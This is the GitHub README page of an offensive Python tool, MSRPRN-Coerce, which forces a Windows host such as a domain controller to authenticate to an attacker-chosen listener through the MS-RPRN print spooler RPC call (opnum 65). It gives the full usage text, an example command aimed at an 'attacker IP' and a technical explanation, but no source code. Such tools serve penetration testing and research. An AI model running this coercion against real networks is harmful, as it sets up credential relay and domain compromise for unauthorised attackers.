Skip to content

A python script to force authentication using MS-RPRN RemoteFindFirstPrinterChangeNotificationEx function (opnum 65).

Notifications You must be signed in to change notification settings

p0dalirius/MSRPRN-Coerce

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 

Repository files navigation

MSRPRN-Coerce

A python script to force authentification using MS-RPRN RemoteFindFirstPrinterChangeNotificationEx function (opnum 65).
GitHub release (latest by date) YouTube Channel Subscribers

Features

Requires: A valid username and password on the domain.

  • Force authentification using MS-RPRN RemoteFindFirstPrinterChangeNotificationEx function (opnum 65).
  • 🐍 Python 3 and Python 2 compatibility.
  • Targets either a single IP or a range of IPs.

Usage

$ ./MS-RPRN-Coerce.py -h
MS-RPRN-Coerce v1.1 - by @podalirius_

usage: e.py [-h] [-v] [--dc-ip ip address] [-d DOMAIN] [-u USER] [--target-ip ip address] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]
            listener target

Force authentification using MS-RPRN RemoteFindFirstPrinterChangeNotificationEx function (opnum 65).

positional arguments:
  listener              IP address or hostname of listener.
  target                IP address or hostname of target.

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Verbose mode. (default: False)

authentication & connection:
  --dc-ip ip address    IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the
                        identity parameter
  -d DOMAIN, --domain DOMAIN
                        (FQDN) domain to authenticate to
  -u USER, --user USER  user to authenticate with
  --target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or
                        Kerberos name and you cannot resolve it

  --no-pass             Don't ask for password (useful for -k)
  -p PASSWORD, --password PASSWORD
                        Password to authenticate with
  -H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
                        NT/LM hashes, format is LMhash:NThash
  --aes-key hex key     AES key to use for Kerberos Authentication (128 or 256 bits)
  -k, --kerberos        Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it
                        will use the ones specified in the command line

Example

To force DC01.LAB.local to authenticate over SMB to your attacker IP 192.168.2.51:

./MS-RPRN-Coerce.py 192.168.2.51 DC01.LAB.local -u user1 -p 'Lab123!'

Technical detail

This attack performs an RPC call of the RpcRemoteFindFirstPrinterChangeNotificationEx function (opnum 65) in the SMB named pipe \pipe\spoolss through the IPC$ share to force authentication from a target machine to another.

Demo

demo.mp4

Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

About

A python script to force authentication using MS-RPRN RemoteFindFirstPrinterChangeNotificationEx function (opnum 65).

Topics

Resources

Stars

Watchers

Forks

Languages